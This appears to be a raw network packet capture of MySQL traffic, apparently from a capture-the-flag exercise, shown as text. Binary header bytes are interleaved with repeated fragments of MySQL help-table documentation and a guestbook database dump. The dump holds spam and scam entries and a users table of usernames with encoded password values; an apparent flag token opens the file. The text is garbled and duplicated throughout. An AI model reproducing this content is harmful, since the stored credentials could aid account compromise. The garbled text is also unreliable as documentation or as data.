8CA4A6BD872A7E239C584C330C3A3344,ucsb,MTNzEwEDA97UdywYxjotAZHB0O1bwtSnL+xn3w==
C958815D32E03D3F1F6238243F3F22Cn bbBi0`ET@/p܂Ao0E<6@?  3Pk (  )ergument is null.\n','mysql> SELECT INSERT(\'Quadratic\', 3, 4, \'What\');\n -> \'QuWhattic\'\nmysql> SELECT INSERT(\'Quadratic\', -1, 4, \'What\');\n -> \'Quadratic\'\nmysql> SELECT INSERT(\'Quadratic\', 3, 100, \'What\');\n -> \'QuWhat\'',''),(78,'HANDLER',6,'The HANDLER statement provides direct access to table storage engine\ninterfaces. It is available for MyISAM tables as MySQL 4.0.0 and\nInnoDB tables as of MySQL 4.0.3.\n','HANDLER tbl_name OPEN [ AS alias ]\nHANDLER tbl_name READ index_name { = | >= | <= | < } (value1,value2,...)\n [ WHERE where_condition ] [LIMIT ... ]\nHANDLER tbl_name READ index_name { FIRST | NEXT | PREV | LAST }\n [ WHERE where_condition ] [LIMIT ... ]\nHANDLER tbl_name READ { FIRST | NEXT }\n [ WHERE where_condition ] [LIMIT ... ]\nHANDLER tbl_name CLOSE',''),(79,'MLINEFROMTEXT',3,' MLineFromText(wkt[,srid])\n MultiLineStringFromText(wkt[,srid])\nConstructs a MULTILINESTRING value using its WKT representation and SRID.\n','',''),(80,'GEOMCOLLFROMWKB',13,' GeomCollFromWKB(wkb[,srid])\n GeometryCollectionFromWKB(wkb[,srid])\nConstructs a GEOMETRYCOLLECTION value using its WKB representation and SRID.\n','',''),(81,'RENAME TABLE',28,'RENAME TABLE tbl_name TO new_tbl_name\n [, tbl_name2 TO new_tbl_namCt ZZBi0`EL@/Jxǀo0E4@?$  P+G/ _A!  oMH:Cy ZZBi0`EL@/Ao0E4@?s  P?2!M eNTC} ZZBi0`EL@/܂Sŀo0E4Sn@? 3 PtXa)@ )ttC bbBiʪET@/o0oo0E SELECT INSERT(\'Quadratic\', 3, 4, \'What\');\n -> \'QuWhattic\'\nmysql> SELECT INSERT(\'Quadratic\', -1, 4, \'What\');\n -> \'Quadratic\'\nmysql> SELECT INSERT(\'Quadratic\', 3, 100, \'What\');\n -> \'QuWhat\'',''),(78,'HANDLER',6,'The HANDLER statement provides direct access to table storage engine\ninterfaces. It is available for MyISAM tables as MySQL 4.0.0 and\nInnoDB tables as of MySQL 4.0.3.\n','HANDLER tbl_name OPEN [ AS alias ]\nHANDLER tbl_name READ index_name { = | >= | <= | < } (value1,value2,...)\n [ WHERE where_condition ] [LIMIT ... ]\nHANDLER tbl_name READ index_name { FIRST | NEXT | PREV | LAST }\n [ WHERE where_condition ] [LIMIT ... ]\nHANDLER tbl_name READ { FIRST | NEXT }\n [ WHERE where_condition ] [LIMIT ... ]\nHANDLER tbl_name CLOSE',''),(79,'MLINEFROMTEXT',3,' MLineFromText(wkt[,srid])\n MultiLineStringFromText(wkt[,srid])\nConstructs a MULTILINESTRING value using its WKT representation and SRID.\n','',''),(80,'GEOMCOLLFROMWKB',13,' GeomCollFromWKB(wkb[,srid])\n GeometryCollectionFromWKB(wkb[,srid])\nConstructs a GEOMETRYCOLLECTION value using its WKB representation and SRID.\n','',''),(81,'RENAME TABLE',28,'RENAME TABLE tbl_name TO new_tbl_name\n [, tbl_name2 TO new_tbl_namC ZZ0`BiEL@/ o09dE4@@#  P+G/ _A!  oMH:C ZZ0`BiEL@/!o0pE4@@r  P?2!M eNTC ZZ0`BiEL@/go0AE4Sn@@ 3 PtXa)@ )ttC bb0`BiET@/gՀo0HE SET @ls = \'LineString(1 1,2 2,3 3)\';\nmysql> SELECT AsText(EndPoint(GeomFromText(@ls)));\n+-------------------------------------+\n| AsText(EndPoint(GeomFromText(@ls))) |\n+------------------------------Ct bb0`BiET@/o0AE SET @ls = \'LineString(1 1,2 2,3 3)\';\nmysql> SELECT AsText(EndPoint(GeomFromText(@ls)));\n+-------------------------------------+\n| AsText(EndPoint(GeomFromText(@ls))) |\n+------------------------------C֕ bbBi0`ET@/p܂Ao0E<6@?  3Ps w  )ee2] ...\n\nThis statement renames one or more tables. It was added in MySQL 3.23.23.\n\nThe rename operation is done atomically, which means that no other thread\ncan access any of the tables while the rename is running. For example,\nif you have an existing table old_table, you can create another\ntable new_table that has the same structure but is empty, and then\nreplace the existing table with the empty one as follows:\n','CREATE TABLE new_table (...);\nRENAME TABLE old_table TO backup_table, new_table TO old_table;',''),(82,'BOOLEAN',1,' BOOL\n BOOLEAN\nThese are synonyms for TINYINT(1).\nThe BOOLEAN synonym was added in MySQL 4.1.0.\nA value of zero is considered false. Non-zero values are considered true.\n\nIn the future,\nfull boolean type handling will be introduced in accordance with standard SQL.\n','',''),(83,'DEFAULT',21,' DEFAULT(col_name)\nReturns the default value for a table column.\nStarting from MySQL 5.0.2, you get an error if the column doesn\'t have\na default value.\n','mysql> UPDATE t SET i = DEFAULT(i)+1 WHERE id < 100;',''),(84,'TINYTEXT',1,' TINYTEXT\n\nA TEXT column with a maximum length of 255\n(2^8 - 1) characters.\n','',''),(85,'DECODE',17,' DECODE(crypt_str,pass_str)\nDecrypts the encrypted string crypt_str using pass_str as C bb0`BiET@/Ԁo0SE<6@@  3Ps w  )ee2] ...\n\nThis statement renames one or more tables. It was added in MySQL 3.23.23.\n\nThe rename operation is done atomically, which means that no other thread\ncan access any of the tables while the rename is running. For example,\nif you have an existing table old_table, you can create another\ntable new_table that has the same structure but is empty, and then\nreplace the existing table with the empty one as follows:\n','CREATE TABLE new_table (...);\nRENAME TABLE old_table TO backup_table, new_table TO old_table;',''),(82,'BOOLEAN',1,' BOOL\n BOOLEAN\nThese are synonyms for TINYINT(1).\nThe BOOLEAN synonym was added in MySQL 4.1.0.\nA value of zero is considered false. Non-zero values are considered true.\n\nIn the future,\nfull boolean type handling will be introduced in accordance with standard SQL.\n','',''),(83,'DEFAULT',21,' DEFAULT(col_name)\nReturns the default value for a table column.\nStarting from MySQL 5.0.2, you get an error if the column doesn\'t have\na default value.\n','mysql> UPDATE t SET i = DEFAULT(i)+1 WHERE id < 100;',''),(84,'TINYTEXT',1,' TINYTEXT\n\nA TEXT column with a maximum length of 255\n(2^8 - 1) characters.\n','',''),(85,'DECODE',17,' DECODE(crypt_str,pass_str)\nDecrypts the encrypted string crypt_str using pass_str as CĘ bbBi0`ET@/˃2o0E CACHE INDEX t1, t2, t3 IN hot_cache;\n+---------+--------------------+----------+----------+\n| Table | Op | Msg_type | Msg_text |\n+---------+--------------------+----------+----------+\n| test.t1 | assign_to_keycache | status | OK |\n| test.t2 | assign_to_keycache | status | OK |\n| test.t3 | assign_to_keycache | status | OK |\n+---------+--------------------+----------+----------+\n','CACHE INDEX\n tbl_index_list [, tbl_index_list] ...\n IN key_cache_name\n\ntbl_index_list:\n tbl_name [[INDEX|KEY] (index_name[, index_name] ...)]',''),(75,'COMPRESS',23,' COMPRESS(string_to_compress)\nCompresses a string. This function requires MySQL to have been compiled\nwith a compression library such as zlib. Otherwise, the return\nvalue is always NULL. The compressed string can be uncompressed with\nUNCOMPRESS().\n','mysql> SELECT LENGTH(COMPRESS(REPEAT(\'a\',1000)));\n -> 21\nmysql> SELC̘ ZZBi0`EL@/܂Sŀo0E4Sp@? 3 PtXi,|9g )tuCܘ bb0`BiET@/o0AE CACHE INDEX t1, t2, t3 IN hot_cache;\n+---------+--------------------+----------+----------+\n| Table | Op | Msg_type | Msg_text |\n+---------+--------------------+----------+----------+\n| test.t1 | assign_to_keycache | status | OK |\n| test.t2 | assign_to_keycache | status | OK |\n| test.t3 | assign_to_keycache | status | OK |\n+---------+--------------------+----------+----------+\n','CACHE INDEX\n tbl_index_list [, tbl_index_list] ...\n IN key_cache_name\n\ntbl_index_list:\n tbl_name [[INDEX|KEY] (index_name[, index_name] ...)]',''),(75,'COMPRESS',23,' COMPRESS(string_to_compress)\nCompresses a string. This function requires MySQL to have been compiled\nwith a compression library such as zlib. Otherwise, the return\nvalue is always NULL. The compressed string can be uncompressed with\nUNCOMPRESS().\n','mysql> SELECT LENGTH(COMPRESS(REPEAT(\'a\',1000)));\n -> 21\nmysql> SELC ZZ0`BiEL@/go0AE4Sp@@ 3 PtXi,|9g )tuC< bbBi0`ET@/p܂Ao0E<6@?  3P{ n  )fthe\npassword. crypt_str should be a string returned from\nENCODE().\n','',''),(86,'<=>',26,' <=>\nNULL-safe equal.\nThis operator performs an equality comparison like the = operator, but\nreturns 1 rather than NULL if both operands are NULL,\nand 0 rather than NULL if one operand is NULL.\n','mysql> SELECT 1 <=> 1, NULL <=> NULL, 1 <=> NULL;\n -> 1, 1, 0\nmysql> SELECT 1 = 1, NULL = NULL, 1 = NULL;\n -> 1, NULL, NULL',''),(87,'LOAD DATA FROM MASTER',6,'LOAD DATA FROM MASTER\n\nTakes a snapshot of the master and copies it to the slave. It updates the\nvalues of MASTER_LOG_FILE and MASTER_LOG_POS so that the slave\nstarts replicating from the correct position. Any table and database\nexclusion rules specified with the --replicate-*-do-* and\n--replicate-*-ignore-* options are honored.\n--replicate-rewrite-db is /not/ taken into account (because one user\ncould, with this option, set up a non-unique mapping such as\n--replicate-rewrite-db=db1->db3 and\n--replicate-rewrite-db=db2->db3, which would confuse the slave when\nit loads the master\'s tables).\n\nUse of this statement is subject to the following conditions:\n\n\n --- It works only with MyISAM tables. Attempting to load a\nnon-MyISAM table results in the error:\n\nERROR 1189 (08S01): Net error CC ZZBi0`EL@/Ao0E4@?s  P?2*!7 eQWCR bb0`BiET@/Ԁo0SE<6@@  3P{ n  )fthe\npassword. crypt_str should be a string returned from\nENCODE().\n','',''),(86,'<=>',26,' <=>\nNULL-safe equal.\nThis operator performs an equality comparison like the = operator, but\nreturns 1 rather than NULL if both operands are NULL,\nand 0 rather than NULL if one operand is NULL.\n','mysql> SELECT 1 <=> 1, NULL <=> NULL, 1 <=> NULL;\n -> 1, 1, 0\nmysql> SELECT 1 = 1, NULL = NULL, 1 = NULL;\n -> 1, NULL, NULL',''),(87,'LOAD DATA FROM MASTER',6,'LOAD DATA FROM MASTER\n\nTakes a snapshot of the master and copies it to the slave. It updates the\nvalues of MASTER_LOG_FILE and MASTER_LOG_POS so that the slave\nstarts replicating from the correct position. Any table and database\nexclusion rules specified with the --replicate-*-do-* and\n--replicate-*-ignore-* options are honored.\n--replicate-rewrite-db is /not/ taken into account (because one user\ncould, with this option, set up a non-unique mapping such as\n--replicate-rewrite-db=db1->db3 and\n--replicate-rewrite-db=db2->db3, which would confuse the slave when\nit loads the master\'s tables).\n\nUse of this statement is subject to the following conditions:\n\n\n --- It works only with MyISAM tables. Attempting to load a\nnon-MyISAM table results in the error:\n\nERROR 1189 (08S01): Net error C] ZZ0`BiEL@/!o0pE4@@r  P?2*!7 eQWC# bbBi0`ET@/˃2o0E 0\nmysql> SELECT LENGTH(COMPRESS(\'a\'));\n -> 13\nmysql> SELECT LENGTH(COMPRESS(REPEAT(\'a\',16)));\n -> 15',''),(76,'COUNT',12,' COUNT(expr)\nReturns a count of the number of non-NULL values in the rows\nretrieved by a SELECT statement.\n','mysql> SELECT student.student_name,COUNT(*)\n -> FROM student,course\n -> WHERE student.student_id=course.student_id\n -> GROUP BY student_name;',''),(77,'INSERT',23,' INSERT(str,pos,len,newstr)\nReturns the string str, with the substring beginning at position\npos and len characters long replaced by the string\nnewstr. Returns the original string if pos is not within\nthe length of the string. Replaces the rest of the string from position\npos is len is not within the length of the rest of the string.\nReturns NULL if any argument is null.\n','mysql> SELECT INSERT(\'Quadratic\', 3, 4, \'What\');\n -> \'QuWhattic\'\nmysql> SELECT INSERT(\'Quadratic\', -1, 4, \'What\');\n -> \'Quadratic\'\nmysql> SELECT INSERT(\'Quadratic\', 3, 100, \'What\');\n -> \'QuWhat\'',''),(78,'HANDLER',6,'The HANDLER statement provides direct access to table storage engine\ninterfaces. It is available for MyISAM tables as MySQL 4.0.0 and\nInnoDBC6 bb0`BiET@/o0AE 0\nmysql> SELECT LENGTH(COMPRESS(\'a\'));\n -> 13\nmysql> SELECT LENGTH(COMPRESS(REPEAT(\'a\',16)));\n -> 15',''),(76,'COUNT',12,' COUNT(expr)\nReturns a count of the number of non-NULL values in the rows\nretrieved by a SELECT statement.\n','mysql> SELECT student.student_name,COUNT(*)\n -> FROM student,course\n -> WHERE student.student_id=course.student_id\n -> GROUP BY student_name;',''),(77,'INSERT',23,' INSERT(str,pos,len,newstr)\nReturns the string str, with the substring beginning at position\npos and len characters long replaced by the string\nnewstr. Returns the original string if pos is not within\nthe length of the string. Replaces the rest of the string from position\npos is len is not within the length of the rest of the string.\nReturns NULL if any argument is null.\n','mysql> SELECT INSERT(\'Quadratic\', 3, 4, \'What\');\n -> \'QuWhattic\'\nmysql> SELECT INSERT(\'Quadratic\', -1, 4, \'What\');\n -> \'Quadratic\'\nmysql> SELECT INSERT(\'Quadratic\', 3, 100, \'What\');\n -> \'QuWhat\'',''),(78,'HANDLER',6,'The HANDLER statement provides direct access to table storage engine\ninterfaces. It is available for MyISAM tables as MySQL 4.0.0 and\nInnoDBC bbBi0`ET@/p܂Ao0E<6@?  3P B  )freading from master\n\n --- It acquires a global read lock on the master while taking the snapshot,\nwhich prevents updates on the master during the load operation.\n\n\nIn the future, it is planned to make this statement work with\nInnoDB tables and to remove the need for a global read lock by using\nnon-blocking online backup.\n\nIf you are loading big tables, you might have to increase the values\nof net_read_timeout and net_write_timeout\non both your master and slave servers.\nSee also : [Server system variables].\n\nNote that LOAD DATA FROM MASTER does /not/ copy any\ntables from the mysql database. This makes it easy to have\ndifferent users and privileges on the master and the slave.\n\nThe LOAD DATA FROM MASTER statement\nrequires the replication account that is used to connect to the master\nto have the RELOAD and SUPER privileges on the master and the\nSELECT privilege for all master tables you want to load. All\nmaster tables for which the user does not have the SELECT privilege are\nignored by LOAD DATA FROM MASTER. This is because the\nmaster hides them from the user: LOAD DATA FROM MASTER calls\nSHOW DATABASES to know the master databases to load, but\nSHOW DATABASES returns only databases for which the user has\nsome privilege.\nSee [SHOW DATABASES, C ZZBi0`EL@/܂Sŀo0E4Sr@? 3 PtXq/1 )tuC ZZBi0`EL@/܂Sŀo0E4@?R 3 PZi5"lm )t_ڌC bb0`BiET@/Ԁo0SE<6@@  3P B  )freading from master\n\n --- It acquires a global read lock on the master while taking the snapshot,\nwhich prevents updates on the master during the load operation.\n\n\nIn the future, it is planned to make this statement work with\nInnoDB tables and to remove the need for a global read lock by using\nnon-blocking online backup.\n\nIf you are loading big tables, you might have to increase the values\nof net_read_timeout and net_write_timeout\non both your master and slave servers.\nSee also : [Server system variables].\n\nNote that LOAD DATA FROM MASTER does /not/ copy any\ntables from the mysql database. This makes it easy to have\ndifferent users and privileges on the master and the slave.\n\nThe LOAD DATA FROM MASTER statement\nrequires the replication account that is used to connect to the master\nto have the RELOAD and SUPER privileges on the master and the\nSELECT privilege for all master tables you want to load. All\nmaster tables for which the user does not have the SELECT privilege are\nignored by LOAD DATA FROM MASTER. This is because the\nmaster hides them from the user: LOAD DATA FROM MASTER calls\nSHOW DATABASES to know the master databases to load, but\nSHOW DATABASES returns only databases for which the user has\nsome privilege.\nSee [SHOW DATABASES, C ZZ0`BiEL@/go0AE4Sr@@ 3 PtXq/1 )tuCʟ ZZ0`BiEL@/o0  E4@@Q 3 PZi5"lm )t_ڌC bbBi0`ET@/˃2o0E= | <= | < } (value1,value2,...)\n [ WHERE where_condition ] [LIMIT ... ]\nHANDLER tbl_name READ index_name { FIRST | NEXT | PREV | LAST }\n [ WHERE where_condition ] [LIMIT ... ]\nHANDLER tbl_name READ { FIRST | NEXT }\n [ WHERE where_condition ] [LIMIT ... ]\nHANDLER tbl_name CLOSE',''),(79,'MLINEFROMTEXT',3,' MLineFromText(wkt[,srid])\n MultiLineStringFromText(wkt[,srid])\nConstructs a MULTILINESTRING value using its WKT representation and SRID.\n','',''),(80,'GEOMCOLLFROMWKB',13,' GeomCollFromWKB(wkb[,srid])\n GeometryCollectionFromWKB(wkb[,srid])\nConstructs a GEOMETRYCOLLECTION value using its WKB representation and SRID.\n','',''),(81,'RENAME TABLE',28,'RENAME TABLE tbl_name TO new_tbl_name\n [, tbl_name2 TO new_tbl_name2] ...\n\nThis statement renames one or more tables. It was added in MySQL 3.23.23.\n\nThe rename operation is done atomically, which means that no other thread\ncan access any of the tables while the rename is running. For example,\nif you have an existing table old_table, you can create another\ntable new_table that has the same structure but is empty, and then\nreplace the existing table with the empty one as followsC ZZBi0`EL@/܂Sŀo0E4St@? 3 PtX!y1*K )uxC ZZBi0`EL@/܂Sŀo0E4Sv@? 3 PtX&4" )uxC bb0`BiET@/o0AE= | <= | < } (value1,value2,...)\n [ WHERE where_condition ] [LIMIT ... ]\nHANDLER tbl_name READ index_name { FIRST | NEXT | PREV | LAST }\n [ WHERE where_condition ] [LIMIT ... ]\nHANDLER tbl_name READ { FIRST | NEXT }\n [ WHERE where_condition ] [LIMIT ... ]\nHANDLER tbl_name CLOSE',''),(79,'MLINEFROMTEXT',3,' MLineFromText(wkt[,srid])\n MultiLineStringFromText(wkt[,srid])\nConstructs a MULTILINESTRING value using its WKT representation and SRID.\n','',''),(80,'GEOMCOLLFROMWKB',13,' GeomCollFromWKB(wkb[,srid])\n GeometryCollectionFromWKB(wkb[,srid])\nConstructs a GEOMETRYCOLLECTION value using its WKB representation and SRID.\n','',''),(81,'RENAME TABLE',28,'RENAME TABLE tbl_name TO new_tbl_name\n [, tbl_name2 TO new_tbl_name2] ...\n\nThis statement renames one or more tables. It was added in MySQL 3.23.23.\n\nThe rename operation is done atomically, which means that no other thread\ncan access any of the tables while the rename is running. For example,\nif you have an existing table old_table, you can create another\ntable new_table that has the same structure but is empty, and then\nreplace the existing table with the empty one as followsC* ZZ0`BiEL@/go0AE4St@@ 3 PtX!y1*K )uxC3 ZZ0`BiEL@/go0AE4Sv@@ 3 PtX&4" )uxC bbBi0`ET@/p܂Ao0E<6@?  3P 7  )f, SHOW DATABASES].\nOn the slave\'s side, the user that issues LOAD DATA FROM MASTER should\nhave grants to drop and create the databases and tables that are copied.\n','',''),(88,'RESET',6,'The RESET statement is used to clear the state of various server\noperations. It also acts as a stronger\nversion of the FLUSH statement. See also : [FLUSH, , FLUSH].\n','RESET reset_option [, reset_option] ...',''),(89,'GET_LOCK',21,' GET_LOCK(str,timeout)\nTries to obtain a lock with a name given by the string str, with a\ntimeout of timeout seconds. Returns 1 if the lock was obtained\nsuccessfully, 0 if the attempt timed out (for example, because another\nclient has previously locked the name), or NULL if an error\noccurred (such as running out of memory or the thread was killed with\nmysqladmin kill). If you have a lock obtained with GET_LOCK(),\nit is released when you execute\nRELEASE_LOCK(), execute a new GET_LOCK(), or your connection\nterminates (either normally or abnormally).\n\nThis function can be used to implement application locks or to\nsimulate record locks. Names are locked on a server-wide basis.\nIf a name has been locked by one client, GET_LOCK() blocks\nany request by another client for a lock with the same name. This\nallows clients that agree on a givC bb0`BiET@/Ԁo0SE<6@@  3P 7  )f, SHOW DATABASES].\nOn the slave\'s side, the user that issues LOAD DATA FROM MASTER should\nhave grants to drop and create the databases and tables that are copied.\n','',''),(88,'RESET',6,'The RESET statement is used to clear the state of various server\noperations. It also acts as a stronger\nversion of the FLUSH statement. See also : [FLUSH, , FLUSH].\n','RESET reset_option [, reset_option] ...',''),(89,'GET_LOCK',21,' GET_LOCK(str,timeout)\nTries to obtain a lock with a name given by the string str, with a\ntimeout of timeout seconds. Returns 1 if the lock was obtained\nsuccessfully, 0 if the attempt timed out (for example, because another\nclient has previously locked the name), or NULL if an error\noccurred (such as running out of memory or the thread was killed with\nmysqladmin kill). If you have a lock obtained with GET_LOCK(),\nit is released when you execute\nRELEASE_LOCK(), execute a new GET_LOCK(), or your connection\nterminates (either normally or abnormally).\n\nThis function can be used to implement application locks or to\nsimulate record locks. Names are locked on a server-wide basis.\nIf a name has been locked by one client, GET_LOCK() blocks\nany request by another client for a lock with the same name. This\nallows clients that agree on a givC bbBi0`ET@/أ  o0E<@?j  3PZiI6  `);his mail to everyone you know. Thank you very much for helping us. -Taliban hacker.',60),(5,'Joy Adams','My name is Joy Adams, I have well trained capuchin monkeys for sale at a very good CONSIDERABLE PRICE. I will also help you in getting the documents of your baby monkeys. Please contact me/my husband for more information. Thanks, Joy Adams',77); UNLOCK TABLES; /*!40000 ALTER TABLE `entries` ENABLE KEYS */; -- -- Table structure for table `users` -- DROP TABLE IF EXISTS `users`; CREATE TABLE `users` ( `id` int(11) NOT NULL auto_increment, `email` varchar(128) default NULL, `password` varchar(128) default NULL, PRIMARY KEY (`id`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1; -- -- Dumping data for table `users` -- /*!40000 ALTER TABLE `users` DISABLE KEYS */; LOCK TABLES `users` WRITE; INSERT INTO `users` VALUES (210,'plezbf','MTNzEwEIABJGrzhHYK2I6hQVhmPMOAVp5DBVoQ=='),(211,'aatjas','MTNzEwEIABNVSIY5GkviLY+1YBdgCbCIFRDz3w=='),(212,'alncgb','MTNzEwEIABThHerXg6GSizIqIWelQ81d9QHGAg=='),(213,'wgqpra','MTNzExEIADEIwg0fvPMna2padbpVymt1BdDPzg=='),(214,'aqrqen','MTNzExEIADKmkxEEmYS4NCyXp/AfQclQJxTtJw=='),(215,'mtpfzz','MTNzExEIADPtmuVfNOLY827/spJbC8/haf74zA=='),(216,'yedjtc','MTNzExEIADS8r5oV4MrZpAm8D/O2Cs6303+Clg=='),(217,'vdinci','MTNzExEIADVFKaDWv8XoIjQBKLXn+C bbBi0`ET@/ԂSŀo0E<@?k  P1ٶЄ afC bb0`BiET@/Ԁo0SE<@@i  3PZiI6  `);his mail to everyone you know. Thank you very much for helping us. -Taliban hacker.',60),(5,'Joy Adams','My name is Joy Adams, I have well trained capuchin monkeys for sale at a very good CONSIDERABLE PRICE. I will also help you in getting the documents of your baby monkeys. Please contact me/my husband for more information. Thanks, Joy Adams',77); UNLOCK TABLES; /*!40000 ALTER TABLE `entries` ENABLE KEYS */; -- -- Table structure for table `users` -- DROP TABLE IF EXISTS `users`; CREATE TABLE `users` ( `id` int(11) NOT NULL auto_increment, `email` varchar(128) default NULL, `password` varchar(128) default NULL, PRIMARY KEY (`id`) ) ENGINE=MyISAM DEFAULT CHARSET=latin1; -- -- Dumping data for table `users` -- /*!40000 ALTER TABLE `users` DISABLE KEYS */; LOCK TABLES `users` WRITE; INSERT INTO `users` VALUES (210,'plezbf','MTNzEwEIABJGrzhHYK2I6hQVhmPMOAVp5DBVoQ=='),(211,'aatjas','MTNzEwEIABNVSIY5GkviLY+1YBdgCbCIFRDz3w=='),(212,'alncgb','MTNzEwEIABThHerXg6GSizIqIWelQ81d9QHGAg=='),(213,'wgqpra','MTNzExEIADEIwg0fvPMna2padbpVymt1BdDPzg=='),(214,'aqrqen','MTNzExEIADKmkxEEmYS4NCyXp/AfQclQJxTtJw=='),(215,'mtpfzz','MTNzExEIADPtmuVfNOLY827/spJbC8/haf74zA=='),(216,'yedjtc','MTNzExEIADS8r5oV4MrZpAm8D/O2Cs6303+Clg=='),(217,'vdinci','MTNzExEIADVFKaDWv8XoIjQBKLXn+C bb0`BiET@/.o0o+PE<@@j  P1ٶЅk afCh bbBi0`ET@/˃2o0E UPDATE t SET i = DEFAULT(i)+1 WHERE id < 100;',''),(84,'TINYTEXT',1,' TINYTEXT\n\nA TEXT column with a maximum length of 255\n(2^8 - 1) characters.\n','',''),(85,'DECODE',17,' DECODE(crypt_str,pass_str)\nDecrypts the encrypted string crypt_str using pass_str as the\npassword. crypt_str should be a string returned from\nENCODE().\n','',''),(86,'<=>',26,' <=>\nNULL-safe equal.\nThis operator performs an equality comparison like the = operator, but\nreturns 1 rather than NULL if both operands are NULL,\nand 0 rather than NULL if one operand is NULL.\n','mysql> SELECT 1 <=> 1, NULL <=> NULL, 1 <=> NULL;\n -> 1, 1, 0\nmysql> SELECT 1 = 1, NULL = NULL, 1 = NULL;\n -> C{ bb0`BiET@/o0AE UPDATE t SET i = DEFAULT(i)+1 WHERE id < 100;',''),(84,'TINYTEXT',1,' TINYTEXT\n\nA TEXT column with a maximum length of 255\n(2^8 - 1) characters.\n','',''),(85,'DECODE',17,' DECODE(crypt_str,pass_str)\nDecrypts the encrypted string crypt_str using pass_str as the\npassword. crypt_str should be a string returned from\nENCODE().\n','',''),(86,'<=>',26,' <=>\nNULL-safe equal.\nThis operator performs an equality comparison like the = operator, but\nreturns 1 rather than NULL if both operands are NULL,\nand 0 rather than NULL if one operand is NULL.\n','mysql> SELECT 1 <=> 1, NULL <=> NULL, 1 <=> NULL;\n -> 1, 1, 0\nmysql> SELECT 1 = 1, NULL = NULL, 1 = NULL;\n -> Cb bbBi0`ET@/ .o+Po0E<@?$  PN%1ٷ* `uafCu bb0`BiET@/Ԁo0SE<@@#  PN%1ٷ+G `uafC٩ bbBi0`ET@/p܂Ao0E<6@?  3P   )gen lock name to use the name to\nperform cooperative advisory locking.\n','mysql> SELECT GET_LOCK(\'lock1\',10);\n -> 1\nmysql> SELECT IS_FREE_LOCK(\'lock2\');\n -> 1\nmysql> SELECT GET_LOCK(\'lock2\',10);\n -> 1\nmysql> SELECT RELEASE_LOCK(\'lock2\');\n -> 1\nmysql> SELECT RELEASE_LOCK(\'lock1\');\n -> NULL',''),(90,'UCASE',23,' UCASE(str)\n\nUCASE() is a synonym for UPPER().\n','',''),(91,'MPOLYFROMWKB',13,' MPolyFromWKB(wkb[,srid])\n MultiPolygonFromWKB(wkb[,srid])\nConstructs a MULTIPOLYGON value using its WKB representation and SRID.\n','',''),(92,'DO',6,'DO executes the expressions but doesn\'t return any results. This is\nshorthand for SELECT expr, ..., but has the advantage that it\'s\nslightly faster when you don\'t care about the result.\n\nDO is useful mainly with functions that have side effects, such as\nRELEASE_LOCK().\n','DO expr [, expr] ...',''),(93,'CURTIME',14,' CURTIME()\n\nReturns the current time as a value in \'HH:MM:SS\' or HHMMSS\nformat, depending on whether the function is used in a string or numeric\ncontext.\n','mysql> SELECT CURTIME();\n -> \'23:50:26\'\nmysql> SELECT CURTIME() + 0;\n -> 235026',''),(94,'BIGINT',1,' BIGINT[(M)] [UNSIGNED] [ZEROFILL]\nA large integer. The signed rC bb0`BiET@/Ԁo0SE<6@@  3P   )gen lock name to use the name to\nperform cooperative advisory locking.\n','mysql> SELECT GET_LOCK(\'lock1\',10);\n -> 1\nmysql> SELECT IS_FREE_LOCK(\'lock2\');\n -> 1\nmysql> SELECT GET_LOCK(\'lock2\',10);\n -> 1\nmysql> SELECT RELEASE_LOCK(\'lock2\');\n -> 1\nmysql> SELECT RELEASE_LOCK(\'lock1\');\n -> NULL',''),(90,'UCASE',23,' UCASE(str)\n\nUCASE() is a synonym for UPPER().\n','',''),(91,'MPOLYFROMWKB',13,' MPolyFromWKB(wkb[,srid])\n MultiPolygonFromWKB(wkb[,srid])\nConstructs a MULTIPOLYGON value using its WKB representation and SRID.\n','',''),(92,'DO',6,'DO executes the expressions but doesn\'t return any results. This is\nshorthand for SELECT expr, ..., but has the advantage that it\'s\nslightly faster when you don\'t care about the result.\n\nDO is useful mainly with functions that have side effects, such as\nRELEASE_LOCK().\n','DO expr [, expr] ...',''),(93,'CURTIME',14,' CURTIME()\n\nReturns the current time as a value in \'HH:MM:SS\' or HHMMSS\nformat, depending on whether the function is used in a string or numeric\ncontext.\n','mysql> SELECT CURTIME();\n -> \'23:50:26\'\nmysql> SELECT CURTIME() + 0;\n -> 235026',''),(94,'BIGINT',1,' BIGINT[(M)] [UNSIGNED] [ZEROFILL]\nA large integer. The signed rCW ZZBi0`EL@/Ao0E4@?s  P?2):!! eUYCh ZZ0`BiEL@/!o0pE4@@r  P?2):!! eUYCI bbBi0`ET@/˃2o0E<[@?"v  P֞%h6g  m|d1, NULL, NULL',''),(87,'LOAD DATA FROM MASTER',6,'LOAD DATA FROM MASTER\n\nTakes a snapshot of the master and copies it to the slave. It updates the\nvalues of MASTER_LOG_FILE and MASTER_LOG_POS so that the slave\nstarts replicating from the correct position. Any table and database\nexclusion rules specified with the --replicate-*-do-* and\n--replicate-*-ignore-* options are honored.\n--replicate-rewrite-db is /not/ taken into account (because one user\ncould, with this option, set up a non-unique mapping such as\n--replicate-rewrite-db=db1->db3 and\n--replicate-rewrite-db=db2->db3, which would confuse the slave when\nit loads the master\'s tables).\n\nUse of this statement is subject to the following conditions:\n\n\n --- It works only with MyISAM tables. Attempting to load a\nnon-MyISAM table results in the error:\n\nERROR 1189 (08S01): Net error reading from master\n\n --- It acquires a global read lock on the master while taking the snapshot,\nwhich prevents updates on the master during the load operation.\n\n\nIn the future, it is planned to make this statement work with\nInnoDB tables and to remove the need for a global read lock by using\nnon-blocking online backup.\n\nIf you are loading big tables, you might have to increase the values\nof net_read_timeout aC\ bb0`BiET@/o0AE<[@@!v  P֞%h6g  m|d1, NULL, NULL',''),(87,'LOAD DATA FROM MASTER',6,'LOAD DATA FROM MASTER\n\nTakes a snapshot of the master and copies it to the slave. It updates the\nvalues of MASTER_LOG_FILE and MASTER_LOG_POS so that the slave\nstarts replicating from the correct position. Any table and database\nexclusion rules specified with the --replicate-*-do-* and\n--replicate-*-ignore-* options are honored.\n--replicate-rewrite-db is /not/ taken into account (because one user\ncould, with this option, set up a non-unique mapping such as\n--replicate-rewrite-db=db1->db3 and\n--replicate-rewrite-db=db2->db3, which would confuse the slave when\nit loads the master\'s tables).\n\nUse of this statement is subject to the following conditions:\n\n\n --- It works only with MyISAM tables. Attempting to load a\nnon-MyISAM table results in the error:\n\nERROR 1189 (08S01): Net error reading from master\n\n --- It acquires a global read lock on the master while taking the snapshot,\nwhich prevents updates on the master during the load operation.\n\n\nIn the future, it is planned to make this statement work with\nInnoDB tables and to remove the need for a global read lock by using\nnon-blocking online backup.\n\nIf you are loading big tables, you might have to increase the values\nof net_read_timeout aC 